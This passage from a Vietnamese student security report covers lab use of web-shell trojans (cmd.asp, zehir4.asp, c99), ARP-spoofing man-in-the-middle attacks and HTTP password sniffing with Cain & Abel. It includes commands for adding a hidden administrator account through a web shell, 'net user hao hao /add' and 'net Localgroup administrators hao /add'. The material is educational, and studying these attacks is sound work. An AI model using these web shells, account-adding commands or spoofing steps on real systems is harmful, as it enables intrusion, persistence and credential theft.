  68. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Cách phòng chống: Ngoài cách sử dụng các chương trình Anti Virus và Trojan, ta có thể dựa và tính chất thông thường những Trojan này bắt buộc phải mở port nào đó ra ngoài, ta có thể xem bằng chương trình Curr Port hay chương trình fport. Trang: 68
  69. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Dựa vào thông tin Currport cung cấp ta có thể xóa đường dẫn của file cehclass.exe và xóa những thông tin về nó trong regedit, và startup v.v. c) Sử dụng Trojan dưới dạng Webbase Trojan dạng webbase thông thường phổ biến hơn trong môi trường web, sau khi hacker khai thác được lỗ hỗng và chiếm quyền sử dụng Web Server, hacker sẽ để lại trojan dưới dạng Webbase và thông qua Trojan này hacker có thể ra vào hệ thống cho những lần sau. Đặc điểm của loại Trojan này là rất khó phát hiện, vì no chạy dưới dạng Web và sử dụng những hàm truy suất hệ thống thông qua các ngôn ngữ asp, phpv.v, vì vậy nó không thể dễ phát hiện như loại trojan kết nối như netcat, beast v.v. Để thực hiện bài lab này trước tiên ta phải cài đặt Web Server gồm IIS và Apache Trojan dưới dạng Web với ngôn ngữ ASP: Ta sử dụng Web Server IIS với Trojan được viết bằng ngôn ngữ này, người viết giới thiệu với các bạn 2 trojan tiêu biểu là cmd.asp và zehir4.asp. Trang: 69
  70. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Đầu tiên bạn cài đặt dịch vụ Web IIS(việc cài đặt khá đơn giản, học viên có thể tự mình làm phần này), chép 2 file vào thư mục www để truy cập thông qua Web. Ta đánh vào lệnh Dir để xem thông tin các file trong hệ thống, với trojan như trên ta có thể xem được các thông tin hệ thống, có thể upload,download thông qua tftp, và add user vào hệ thống ví dụ lệnh “ net user hao hao /add”, “net Localgroup administrators hao /add “. Vào link để xem về trojan webbase thứ 2 Trang: 70
  71. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Ta thấy Trojan này hướng đồ họa và tiện dụng hơn, việc lấy file,xóa file hoàn toàn thông qua web, chúng ta có thể dễ dàng thao tác trên máy của nạn nhân. Trojan với ngôn ngữ PHP: Ta sử dụng Web server Apache với trojan được viết bằng ngôn ngữ này, người viết giới thiệu đến các bạn trojan tiêu biểu là c99. Đầu tiên bạn sử dụng chương trình phpeasy để cài kết hợp 3 gói sau apache, php, và mysql. Tuy nhiên trong bài các bạn chỉ cần sử dụng php và apache. Chép các file trojan và thư mục www để có thể chạy được các file này Trang: 71
  72. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Đây là file trojan rất nguy hiểm, nó vừa có thể download, upload file, đồng thời hỗ trợ chúng ta chạy những úng dụng như perl, thực thi các hàm hệ thống, cung cấp thông tin về nạn nhân hiện hànhv.v. Do tính chất như vậy cho nên Trojan này được hacker dùng rất rộng rãi(ngoài ra còn có r57, phpshellv.v) 8 CÁC PHƯƠNG PHÁP SNIFFER 8.1) Giới thiệu tổng quan về Sniffer Sniffer được hiểu đơn giản như là một chương trình cố gắng nghe ngóng các lưu lượng thông tin trên một hệ thống mạng Sniffer được sử dụng như một công cụ để các nhà quản trị mạng theo dõi và bảo trì hệ thống mạng. Về mặt tiêu cực, sniffer được sử dụng như một công cụ với mục đích nghe lén các thông tin trên mạng để lấy các thông tin quan trọng Sniffer dựa vào phương thức tấn công ARP để bắt gói các thông tin được truyền qua mạng. Trang: 72
  73. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Tuy nhiên những giao dịch giữa các hệ thống mạng máy tính thường là những dữ liệu ở dạng nhị phân (binary). Bởi vậy để hiểu được những dữ liệu ở dạng nhị phân này, các chương trình Sniffer này phải có tính năng phân tích các nghi thức (Protocol Analysis), cũng như tính năng giải mã (Decode) các dữ liệu ở dạng nhị phân để hiểu được chúng. Một số các ứng dụng của Sniffer được sử dụng như: dsniff, snort, cain, ettercap, sniffer pro 8.2) Hoạt động của sniffer Sniffer hoạt động chủ yếu dựa trờn dạng tấn cụng arp Sniffer hoạt động chủ yếu dựa trên dạng tấn công ARP 8.3) Tấn công arp . Giới thiệu Đây là một dạng tấn công rất nguy hiểm, gọi là Man In The Middle. Trong trường hợp này giống như bị đặt máy nghe lén, phiên làm việc giữa máy gởi và máy nhận vẫn diễn ra bình thường nên người sử dụng không hề hay biết mình bị tấn công. . Sơ Lược Quá trình hoạt động Trên cùng một mạng, Host A và Host B muốn truyền tin cho nhau, các Packet sẽ được đưa xuống tầng Datalink để đóng gói, các Host phải đóng gói MAC nguồn, MAC đích vào Frame. Như vậy trước khi quá trình truyền Dữ liệu, các Host phải hỏi địa chỉ MAC của nhau. Nếu như Host A khởi động quá trình hỏi MAC trước, nó sẽ gởi broadcast gói tin ARP request cho tất cả các Host để hỏi MAC Host B, lúc đó Host B đã có MAC của Host A, sau đó Host B chỉ trả lời cho Host A MAC của Host B(ARP reply). Có 1 Host C liên tục gởi ARP reply cho Host A và Host B địa chỉ MAC của Host C, nhưng lại đăt địa chỉ IP là Host A và Host B. Lúc này Host A cứ nghĩ máy B có MAC là C. Như vậy các gói tin mà Host A gởi cho Host B đều bị đưa đến Host C, gói Trang: 73
  74. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung tin Host B trả lời cho Host A cũng đưa đến Host C. Nếu Host C bật chức năng forwarding thì coi như Host A và Host B không hề hay biết rằng mình bị tấn công ARP. . Ví dụ: Ta có mô hình gồm các host Attacker: là máy hacker dùng để tấn công ARP IP: 10.0.0.11 MAC: 0000.0000.1011 Victim: là máy bị tấn công IP: 10.0.0.12 MAC: 0000.0000.1012 HostA IP: 10.0.0.13 MAC: 0000.0000.1013 Đầu tiên, HostA muốn gởi dữ liệu cho Victim, cần phải biết địa chỉ MAC của Victim để liên lạc. HostA sẽ gởi broadcast ARP Request tới tất cả các máy trong cùng mạng LAN để hỏi xem IP 10.0.0.12 (IP của Victim) có địa chỉ MAC là bao nhiêu. Trang: 74
  75. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Attacker và Victim đều nhận được gói tin ARP Request, nhưng chỉ có Victim gởi trả lời gói tin ARP Reply lại cho HostA. ARP Reply chứa thông tin về IP 10.0.0.12 và MAC 0000.0000.1012 của Victim. HostA nhận được gói ARP Realy từ Victim, biết được địa chỉ MAC của Victim là 0000.0000.1012 sẽ bắt đầu thực hiện liên lạc truyền dữ liệu đến Victim. Attacker không thể xem nội dung dữ liệu được truyền giữa HostA và Victim. Máy Attacker muốn thực hiện ARP attack đối với máy Victim. Attacker muốn mọi gói tin. HostA gởi đến máy Victim đều có thể chụp lại được để xem trộm. Attacker thực hiện gởi liên tục ARP Reply chứa thông tin về IP của Victim 10.0.0.12, còn địa chỉ MAC là của Attacker 0000.0000.1011. HostA nhận được ARP Reply nghĩ rằng IP Victim 10.0.0.12 có địa chỉ MAC là 0000.0000.1011. HostA lưu thông tin này vào bảng ARP Cache và thực hiện kết nối. Lúc này mọi thông tin, dữ liệu HostA gởi tới máy có IP 10.0.0.12 (là máy Victim) sẽ gởi qua địa chỉ MAC 0000.0000.1011 của máy Attacker 8.4) Các bước thực nghiệm: a) Sử dụng phần mềm CAIN Trang: 75
  76. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung b) Cấu hình Cain & Abel cần cấu hình một vài thông số, mọïi thứ có thể được điều chỉnh thông qua bảng Configuration dialog. Trang: 76
  77. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Tại đây chúng ta chọn card mạng sử dụng để tiến hành sniffer và tính năng APR. Check vào ô Option để kích hoạt hay không kích hoạt tính năng. Sniffer tương thích với Winpcap version 2.3 hay cao hơn . Version này hỗ trợ card mạng rất nhiều. Trang: 77
  78. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Đây là nơi bạn có thể config ARP . Mặc định Cain ngăn cách 1 chuỗi gửi gói ARP từ nạn nhân trong vòng 30 giây. Đây thực sự là điều cần thiết bởi vì việc xâm nhập vào thiết bị có thể sẽ gây ra sự không lưu thông tính hiệu . Từ dialog này bạn có thể xác định thời gian giữa mỗi lần thực thi ARP, xác định thông số ít sẽ tạo cho ARP lưu thông nhiều,ngược lại sẽ khó khăn hơn trong việc xâm nhập. . Tại mục này, ta cần chú ý tới phần Spoofing Options: Mc đu tiên cho phép ta s dng đa ch MAC và IP thc ca máy mà mình dang s dng. Mc th hai cho phép s dng mt IP và đa ch MAC gi mo. (Lu ý đa ch ta chn phi không trùng vi IP ca máy khác) Khi click vào tab filters and ports, ta sẽ thấy một số thông tin về giao thức và các con số port tương ứng với giao thức đó Trang: 78
  79. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung c) Fliter and Ports Tab: Tại đây bạn có thể chọn kích hoạt hay không kích hoạt các port ứng dụng TCP/UDP. HTTP fields tab: Trang: 79
  80. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Tại đây có 1 list danh sách username và password sử dụng được HTTP sniffer lọc lại. Tại tab này cho phép ta biết dược chương trình này sẽ bắt 1 số thông tin về trang web như: - Mục Username Fields: nó sẽ lấy thông tin những gì liên quan đến cái tên (user name, account, web name v.v ) . - Mục Password Fields: lanh vực này sẽ đãm nhiệm vai trò lấy thông tin về password - (login password, user pass, webpass v.v ) Các ứng dụng của CAIN: Bảo vệ password manager: Trước hết nó được sử dụng như 1 private key bảo mật một số vấn đề cho user . Hầu hết thông tin trong Protected Storage được mã hóa.Sử dụng như 1 key nhận được từ việc logon password của user.Cho phép điều hòa viêc truy cập thông tin để owner có thể an toàn truy xuất. Một vài ứng dụng của Windows có nét đặc trưng nên sử dụng dịch vụ này: Internet Explorer, Oulook, Oulook Express. Trang: 80
  81. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Chương 3 ĐÁNH GIÁ KẾT QUẢ 9 ƯU KHUYẾT ĐIỂM: 9.1) Ưu điểm: - Đây là một định hướng hay và thực tiễn nó còn khá mới mẻ trong ngành tin học của nước ngoài cũng như nước ta. - Giúp cho mọi người thêm hiểu biết và phòng tránh một phần trong việc truy cập và làm việc tìm kiếm thông tin trên mạng bảo mật công ty. 9.2) Khuyết điểm: - Ngành bảo mật còn chưa phát tiển mạnh việc học hỏi và phát triển tay nghề bị hạn chế. - Thời gian làm đồ án còn hạn chế nên chưa tìm hiểu sâu một số vấn đề và chưa giải quyết được. - Thông tin tìm hiểu hiếm hoi tài liệu được dịch thuật chưa có nhiều phần mềm thử nghiệm tìm kiếm khó khăn một số cần bản quyền. Trang: 81
  82. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Chương 4 KẾT LUẬN Trong khoảng thời gian 2 tháng vừa tìm tòi học hỏi vừa làm đồ án chúng em đã làm được một số căn bản trong báo cáo tốt nghiệp, chúng em đã tạm hoàn thiện báo cáo của mình đúng tiến độ của trường đưa ra. Nghiên cứu và học hỏi các kinh nghiệm đáng kể dể có thể áp dụng vào thực tiển trong việc làm. Trang: 82
  83. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Chương 5 HƯỚNG PHÁT TRIỂN: Ngoài việc bổ sung thêm một số các hạn chế trên của đồ án, trong tương lai mở rộng theo nhiều chiều hướng phát triển thêm: Bổ sung những hạn chế của đề tài, mở rộng các chức năng và nguyên cứu kỹ để đảm bảo độ tin cậy của đồ án, liên lạc với các chiêu gia và có kinh nghiệm trong lĩnh vưc bảo mật. Tạo và phát triển forum, để mọi người tham gia góp phần nâng cao kiến thức hỗ trợ giúp đỡ kỹ thuật cho mọi người thích tìm hiểu. Tìm kiếm sách vở bài viết,tìm kiếm trên mạng sưu tập nghiên cứu chia sẽ dể nâng cao trình độ. Trang: 83
  84. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung DANH MỤC TÀI LIỆU THAM KHẢO 9.3) Các sách đã tham khảo trong chương trình này: - CEH welcomme to certified ethical hacker class của EC-Council 9.4) Các trang website tham khảo trong chương trình: www.3c.com www.athena.com.vn www.eccouncil.org www.nhatnghe.com.vn 9.5) Các phần mềm hỗ trợ cho việc viết chương trình: - Angry IP Scanner 2.21 - Beast 2.07 - Cain & Abel V4.9.35 - Kaspresky Internet security - SC-KeyLog PRO 3.2 - Retina Network Security Scanner v5.15.7 - Microsoft windows server2003 - Microsoft office word 2003 - Microsoft .Net framework-3.3.3. - Macromedia Flash MX 2004. 9.6) Hướng dẫn cài đặt chương trình. - Ở đây chúng tôi hướng dẫn cài đặt ở trong đĩa DVD Trang: 84